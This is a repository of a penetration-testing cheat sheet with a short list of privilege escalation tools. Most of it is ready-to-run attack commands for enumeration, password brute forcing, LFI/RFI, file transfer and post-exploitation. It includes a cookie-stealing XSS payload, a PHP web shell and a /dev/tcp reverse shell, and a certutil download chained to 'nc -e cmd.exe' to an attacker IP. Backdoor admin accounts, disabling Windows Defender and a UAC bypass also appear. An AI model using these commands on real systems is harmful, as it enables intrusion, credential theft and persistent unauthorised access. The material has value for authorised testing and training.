```text
├── .gitattributes
├── SUMMARY.md
├── privilege-escalation-tools.md
└── README.md
```

/.gitattributes:

```text
# Auto detect text files and perform LF normalization
* text=auto
```

/SUMMARY.md:

# Table of contents

* [Cheat Sheet](README.md)
* [Privilege Escalation Tools](privilege-escalation-tools.md)

/privilege-escalation-tools.md:

---
description: >-
  A list of amazing priv esc scripts I have found from personal experience. If
  you have found other tools, please feel free to DM me about them.
---

# Privilege Escalation Tools

## WINDOWS

* winPEAS
* SeatBelt
* Mssql
* PowerUpSQL

## LINUX

* linPEAS
* LinEnum
* linux-smart-enumeration

/README.md:

# For more up to date cheat sheets, references and notes on various red teaming/pentesting topics, check out my frequently updated repo
# [HackAllTheThings](https://github.com/akenofu/HackAllTheThings)

***
# Cheat Sheet

## ENUMERATION

All-around scanner:

```text
$ python3 autorecon.py $ip -v
```

Host discovery:

```text
$ nmap -sn 10.11.1.1-254 -vv -oA hosts
$ netdiscover -r 10.11.1.0/24
$ crackmapexec smb 192.168.10.0/24
$ arp-scan --interface=eth0 192.168.0.0/24
```

DNS server discovery:

```text
$ nmap -p 53 10.11.1.1-254 -vv -oA dcs
```

## PORT

Port scanning and service detection:

```text
$ unicornscan -mT -I 10.11.1.252:a -v
$ unicornscan -mU -I 10.11.1.252:p -v
$ nmap -sC -sV -Pn -oA standard_tcp -vv $ip
$ nmap -sC -sV -sU -Pn -oA standard_udp -vv $ip
$ nmap -p 0-65535 -sU -sT -Pn -vv -oN all_ports $ip
$ unicornscan -mU -I 192.168.24.53:a -v -l unicorn_full_udp.txt ; unicornscan -mT -I 192.168.24.53:a -v -l unicorn_full_tcp.txt
```

Vulnerability scanning (`$ports` is the comma-separated list of open ports found above):

```text
$ nmap -Pn -sT -sU -p $ports --script=*vuln* -vv -oN nmap_vuln $ip
```

Banner grabbing:

```text
$ nc -nv $ip $port
```

## DNS

Find DNS server:

```text
$ nslookup thinc.local 10.11.1.221
$ dig @10.11.1.221 thinc.local
```

Forward lookup brute force:

```text
$ dnsrecon -d example.com -D /usr/share/wordlists/dnsmap.txt -t std --xml dnsrecon.xml
```

Reverse lookup brute force:

```text
$ dnsrecon -d demo.com -t rvl
```

DNS zone transfers:

```text
$ host -l domain $ip
$ dnsrecon -d megacorpone.com -t axfr
$ dnsenum zonetransfer.me
```

## FTP

Vulnerability scanning:

```text
$ nmap -p 21 --script="+*ftp* and not brute and not dos and not fuzzer" -vv -oN ftp $ip
```

Default creds:

```text
$ hydra -s 21 -C /usr/share/sparta/wordlists/ftp-default-userpass.txt -u -f $ip ftp
```

## FTP MANUAL SCANS

Anonymous login.

Enumerate the hell out of the machine!

* OS version
* Other software you can find on the machine (Prog Files, yum.log, /bin)
* Password files
* DLLs for msfpescan / BOF targets

Do you have UPLOAD potential?

* Can you trigger execution of uploads?
* Swap binaries?

Public exploits for the FTP server software.

## HTTP(S)

Vulnerability scanning:

```text
$ nmap -p 80,443 --script="+*http* and not brute and not dos and not fuzzer" -vv -oN http(s) $ip
$ nikto -port 80,443 -host $ip -o nikto.txt -v
```

or

```text
$ nikto -useragent Mozilla -host http://10.11.1.24 -o nikto.txt
```

Directories:

```text
$ gobuster dir -u https://10.11.1.35 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -t 50 -k -o gobuster
```

WordPress:

```text
$ wpscan --url http://10.11.1.251/wp
```

## MANUAL HTTP SCANS

Check the source code.

Technologies used:

```text
$ whatweb $ip:80 --color=never --log-brief="whattheweb.txt"
$ curl -s http://$ip/robots.txt
```

Burp:

* GET params
* POST params
* Cookies
* User agents
* Referrers
* All the headers
* Change GET requests to POSTs
* Take note of all error codes
* Fuzz parameter values, names, etc.

Things to be on the lookout for:

* Default credentials for software
* SQL-injectable GET/POST params
* XSS
  * Test:

    ```text
    <script>alert("Hello! I am an alert box!!");</script>
    <iframe SRC="http://10.11.0.106/xss_test.html" height="0" width="0"></iframe>
    ```

  * Exploit:

    ```text
    <script>new Image().src="http://10.11.0.106/bogus.php?output="+document.cookie;</script>
    ```

* LFI/RFI through `?page=foo` type params
  * LFI:
    * `/etc/passwd` | `/etc/shadow` insta-win
    * `/var/www/html/config.php` or similar paths to get SQL etc. creds
    * `?page=php://filter/convert.base64-encode/resource=../config.php`
    * `../../../../../boot.ini` to find out the Windows version
  * RFI:
    * Have your PHP/CGI downloader ready
    * `<?php include $_GET['inc']; ?>` is the simplest backdoor to keep it dynamic without anything messing up your output
    * Then you can just request `http://IP/inc.php?inc=http://$YOURIP/bg.php` and have full control with minimal footprint on the target machine
    * Get `phpinfo()`

HTTPS:

* Heartbleed / CRIME / other similar attacks
* Read the actual SSL cert to:
  * Find out the potential correct vhost to GET
  * Check whether the clock is skewed
  * Find any names that could be usernames for brute-forcing/guessing

LFI Linux files:

```text
/etc/issue
/proc/version
/etc/profile
/etc/passwd
/etc/shadow
/root/.bash_history
/var/mail/root
/var/spool/cron/crontabs/root
/etc/sysconfig/iptables
/etc/sysconfig/ip6tables
```

LFI Windows files:

```text
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\repair\SAM
%WINDIR%\win.ini
%SYSTEMDRIVE%\boot.ini
%WINDIR%\Panther\sysprep.inf
%WINDIR%\system32\config\AppEvent.Evt
c:\windows\system32\drivers\etc\hosts
```

## MYSQL

Vulnerability scanning:

```text
$ nmap -p 3306 --script="+*mysql* and not brute and not dos and not fuzzer" -vv -oN mysql $ip
```

Default creds:

```text
$ hydra -s 3306 -C /usr/share/sparta/wordlists/mysql-default-userpass.txt -u -f $ip mysql
```

Public exploit.

## RPC

Find NFS port:

```text
$ nmap -p 111 --script=rpcinfo.nse -vv -oN nfs_port $ip
```

Services running:

```text
$ rpcinfo -p $ip
```

Null session / user RPC login:

```text
$ rpcclient -U "" $ip
```

* srvinfo
* enumdomusers
* enumprivs
* enumalsgroups domain
* lookupnames administrators
* querydominfo
* queryuser john

## NFS

Show mountable NFS shares:

```text
$ nmap --script=nfs-showmount -oN mountable_shares $ip
$ showmount -e $ip
```

List NFS exported shares. If `rw,no_root_squash` is present, upload and execute sid-shell:

```text
$ chown root:root sid-shell; chmod +s sid-shell
```

## SMTP

Enumerating user accounts:

```text
$ nc -nv $ip 25
VRFY user
USER user
EXPN user
```

## SMB&NETBIOS

Overall scan:

```text
$ enum4linux -a $ip
```

Guest user and null authentication:

```text
$ smbmap -u anonymous -p anonymous -H 10.10.10.172
$ smbmap -u '' -p '' -H 10.10.10.172
```

Vulnerability scanning:

```text
$ nmap --script="+*smb* and not brute and not dos and not fuzzer" -p 139,445 -oN smb-vuln $ip
```

Enumerate hostnames:

```text
$ nmblookup -A $ip
```

List shares with no creds and guest account:

```text
$ smbmap -H [ip/hostname] -u anonymous -p hokusbokus -R
$ nmap --script smb-enum-shares -p 139,445 $ip
```

List shares with creds:

```text
$ smbmap -H [ip] -d [domain] -u [user] -p [password] -r --depth 5 -R
```

Connect to share:

```text
$ smbclient '\\[ip]\[share name]'
```

NetBIOS information scanning:

```text
$ nbtscan -r $ip/24
```

Nmap: find exposed NetBIOS servers:

```text
$ nmap -sU --script nbstat.nse -p 137 $ip
```

Mount SMB share:

```text
$ mount -t cifs //<server ip>/<share> <local dir> -o username="guest",password=""
```

## SNMP

Enumeration tools:

```text
$ onesixtyone -c <community list file> <ip-address>
$ snmpwalk -c <community string> -v<version> $ip 1.3.6.1.2.1.25.4.2.1.2
$ snmp-check $ip
```

Default community names:

* public, private, cisco, manager

Enumerate MIB:

* `1.3.6.1.2.1.25.1.6.0`: System Processes
* `1.3.6.1.2.1.25.4.2.1.2`: Running Programs
* `1.3.6.1.2.1.25.4.2.1.4`: Processes Path
* `1.3.6.1.2.1.25.2.3.1.4`: Storage Units
* `1.3.6.1.2.1.25.6.3.1.2`: Software Name
* `1.3.6.1.4.1.77.1.2.25`: User Accounts
* `1.3.6.1.2.1.6.13.1.3`: TCP Local Ports

SNMP v3:

```text
$ nmap -p 161 --script=snmp-info $ip
```

Default creds wordlist:

* `/usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt`

## DOMAIN

Leak DC hostname:

```text
$ nslookup
> server 10.10.10.172
> set type=ns
> 10.10.10.172
> 127.0.0.1
```

Nmap:

```text
$ nmap -p 53 --script=*dns* -vv -oN dns $ip
```

## LDAP/Active Directory

Look for anonymous bind:

```text
$ ldapsearch -x -b "dc=megabank,dc=local" "*" -h $ip
```

## FILE TRANSFER

Simple servers:

```text
$ python -m SimpleHTTPServer 80
$ python -m pyftpdlib -p 21 -w -d /tmp
$ ptftpd -p 69 -v eth0 /tmp
$ impacket-smbserver -username guest -password guest -smb2support share $(pwd)   # Might need to remove the -smb2support option
```

Tools:

* Linux & Windows (newer Windows versions only):

  ```text
  wget http://10.11.0.106/nc.exe -O nc.exe
  curl http://10.11.0.106/nc.exe -o nc.exe
  ```

* Windows (should work on most Windows versions):

  ```text
  powershell (New-Object System.Net.WebClient).DownloadFile("https://10.10.10.144/test.txt", "test.txt")
  net use Z: \\computer_name\share_name                # Mount SMB share
  $pass = "guest" | ConvertTo-SecureString -AsPlainText -Force
  $cred = New-Object System.Management.Automation.PsCredential('guest', $pass)
  New-PSDrive -name guest -root \\10.10.15.53\share -Credential $cred -PSProvider "filesystem"
  certutil.exe -urlcache -split -f "http://10.11.0.106:8000/nc.exe" nc.exe && nc.exe -nv 10.11.0.106 443 -e cmd.exe
  ```

* VBScript:

  ```text
  echo strUrl = WScript.Arguments.Item(0) > wget.vbs
  echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
  echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
  echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
  echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
  echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
  echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
  echo Err.Clear >> wget.vbs
  echo Set http = Nothing >> wget.vbs
  echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
  echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
  echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
  echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
  echo http.Open "GET", strURL, False >> wget.vbs
  echo http.Send >> wget.vbs
  echo varByteArray = http.ResponseBody >> wget.vbs
  echo Set http = Nothing >> wget.vbs
  echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
  echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
  echo strData = "" >> wget.vbs
  echo strBuffer = "" >> wget.vbs
  echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
  echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
  echo Next >> wget.vbs
  echo ts.Close >> wget.vbs
  cscript wget.vbs http://10.11.0.6/wce32_upx.exe wce32_upx.exe
  ```

* FTP non-interactive mode:

  ```text
  ftp -A 10.11.0.106
  binary
  GET nc.exe
  bye
  ```

* TFTP:

  ```text
  tftp -i 10.11.0.106 GET exploit.exe
  ```

## SHELLS

Spawning a TTY shell, i.e. breaking out of jail or a limited shell. You should almost always upgrade your shell after taking control of an apache or www user (for example when you encounter the error message `sh: no job control in this shell` while trying to run an exploit).

Interactive shell:

```text
$ python -c 'import pty; pty.spawn("/bin/bash")'
$ echo os.system('/bin/bash')
```

Adjust interactive shell:

```text
Ctrl-Z
$ echo $TERM          # find term
$ stty raw -echo      # disable shell echo
$ fg
$ reset
$ export SHELL=bash
$ export TERM=xterm
```

PHP backdoor:

```text
<?php echo shell_exec($_GET['cmd']);?>
```

PHP shell:

```text
<?php echo shell_exec('bash -i >& /dev/tcp/10.11.0.106/443 0>&1');?>
```

## PSSWD CRACKING

Look for the hash in online databases.

Hashcat:

* Find the mode in hashcat:

  ```text
  $ hashcat --example-hashes
  ```

* Crack with a wordlist:

  ```text
  $ hashcat -m 0 hashes /usr/share/wordlists/rockyou.txt
  ```

John:

```text
$ john files --wordlist=/usr/share/wordlists/rockyou.txt
```

## PSSWD Mutation

Hashcat:

```text
$ hashcat -m 0 bfield.hash /usr/share/wordlists/rockyou.txt -r rules
```

## PSSWD BruteForcing

Crackmapexec:

* Enumerate password policy:

  ```text
  $ crackmapexec smb 192.168.215.104 -u 'Administrator' -p 'PASS' --pass-pol
  ```

* Bruteforce SMB:

  ```text
  $ crackmapexec smb 10.10.10.172 -u /root/users.lst -p /root/passwords.lst
  ```

* Bruteforce WinRM:

  ```text
  $ crackmapexec winrm 10.10.10.172 -u /root/users.lst -p /root/passwords.lst
  ```

Hydra:

* Hydra brute force against SNMP:

  ```text
  $ hydra -P password-file.txt -v $ip snmp
  ```

* Hydra FTP with known user and rockyou password list:

  ```text
  $ hydra -t 1 -l admin -P /usr/share/wordlists/rockyou.txt -vV $ip ftp
  ```

* Hydra SSH using a list of users and passwords:

  ```text
  $ hydra -v -V -u -L users.txt -P passwords.txt -t 1 $ip ssh
  ```

* Hydra POP3 brute force:

  ```text
  $ hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f $ip pop3 -V
  ```

* Hydra SMTP brute force:

  ```text
  $ hydra -P /usr/share/wordlists/nmap.lst $ip smtp -V
  ```

* Hydra attack on an HTTP GET 401 login with a dictionary:

  ```text
  $ hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin
  ```

* Hydra attack on Windows Remote Desktop with rockyou:

  ```text
  $ hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip
  ```

* Hydra brute force of a WordPress admin login:

  ```text
  $ hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
  ```

## POST EXPLOITATION LINUX

Add user with root privs:

```text
$ sudo useradd -ou 0 -g 0 john
$ sudo passwd john
```

Combine shadow and passwd files:

```text
$ unshadow passwd.txt shadow.txt > passwords.txt
```

Find listening services:

```text
$ netstat -alp
```

Copy SSH private keys:

```text
/etc/ssh/ssh_host_dsa_key
/etc/ssh/ssh_host_key
```

Check interesting files:

```text
/var/log
/var/log/secure
/etc/passwd
/etc/shadow
~/.bash_history
~/.mysql_history
```

Check log files of some of the services (http, ftp, ssh):

```text
$ grep 'sshd' /var/log/auth.log
```

Linux post exploitation:

```text
$ ifconfig
```

## POST EXPLOITATION WINDOWS

Backdoor user:

```text
> net user backdoor backdoor@123 /add
> net localgroup administrators backdoor /add
> net localgroup "Remote Desktop Users" backdoor /add
> net user admin newpassword
```

Enabling RDP:

```text
> netsh firewall add portopening TCP 3389 "Open Port 3389" ENABLE ALL
> netsh firewall set portopening TCP 3389 proxy ENABLE ALL
> netsh firewall set service RemoteDesktop enable
> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
```

Disable RDP:

```text
> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
> netsh firewall delete portopening protocol=TCP port=3389
```

Check log files of some of the services:

* http
* ftp
* ssh

Windows post exploitation:

```text
> arp -a
> netstat -ano
> ipconfig /all
> route print
> schtasks /query /fo LIST /v
> netsh firewall show config
> net group
> net localgroup
> (for /R "." %A in (*.txt) do echo %~fA %~zA) | findstr /v "echo"
> net share
```

* PowerShell to enumerate users and computers.

## USEFUL LINUX COMMANDS

Find file by name:

```text
$ find /home/username/ -name "*.err"
```

Find writable directories:

```text
$ find / -perm -o+w
$ find . -perm -o+w -exec chmod +t {} +
$ find / -writable
$ find / -type d \( -perm -g+w -or -perm -o+w \) -exec ls -adl {} \; | grep drwxrwsr
```

Pipe to clipboard:

```text
$ ls | xclip -selection c
```

tar:

* Create:

  ```text
  $ tar -czvf linux_priv_esc.tar.gz /root/Desktop
  ```

* Extract:

  ```text
  $ tar xvzf linux_priv_esc.tar.gz
  ```

Kerberos auth:

```text
$ xfreerdp /u:alice /v:10.11.1.50
```

## USEFUL WINDOWS COMMANDS

Find log files in directory:

```text
> dir /s *log*
```

Process:

```text
> tasklist
> taskkill /F /PID pid_number
```

Disable Windows Defender:

```text
> sc stop WinDefend
```

UAC bypass:

```text
> echo $username = "alice" > run.ps1
> echo $secpasswd = ConvertTo-SecureString "aliceishere" -AsPlainText -Force >> run.ps1
> echo $mycreds = New-Object System.Management.Automation.PSCredential ("$username", $secpasswd) >> run.ps1
> echo Start-Process veil_meterpreter.bat -Credential ($mycreds) >> run.ps1
> powershell -ExecutionPolicy Bypass -File run.ps1
```

## PIVOTING

Dynamic port forwarding:

* SSH:

  ```text
  $ ssh -D 9000 root@$ip
  ```

  * Set proxychains.conf to `127.0.0.1 1080`
  * `proxychains nc -nv 10.11.0.106`

* Reverse SSH from Windows to my Kali:

  ```text
  $ systemctl start ssh.service
  > putty.exe -ssh root@10.11.0.106
  ```

Local port forward:

* Explanation:

  ```text
  $ ssh -L 80:localhost:80 SUPERSERVER
  ```

  A connection made to the local port 80 is forwarded to port 80 on SUPERSERVER.

* SSH syntax:

  ```text
  $ ssh -L localPort:forwardToHost:onPort connectToHost
  ```

Remote port forward:

* Explanation:

  ```text
  $ ssh -R 80:localhost:80 tinyserver
  ```

  A connection made to the remote port 80 on tinyserver is forwarded to port 80 on my localhost.

* SSH syntax:

  ```text
  $ ssh -R remotePort:forwardToHost:onPort connectToHost
  ```

Metasploit:

* Dynamic port forwarding:
  * autoroute module
    * Set session to the meterpreter session
  * socks4a module
    * Set SRVPORT (no need to set the host)
  * Set proxychains.conf to `127.0.0.1 1080`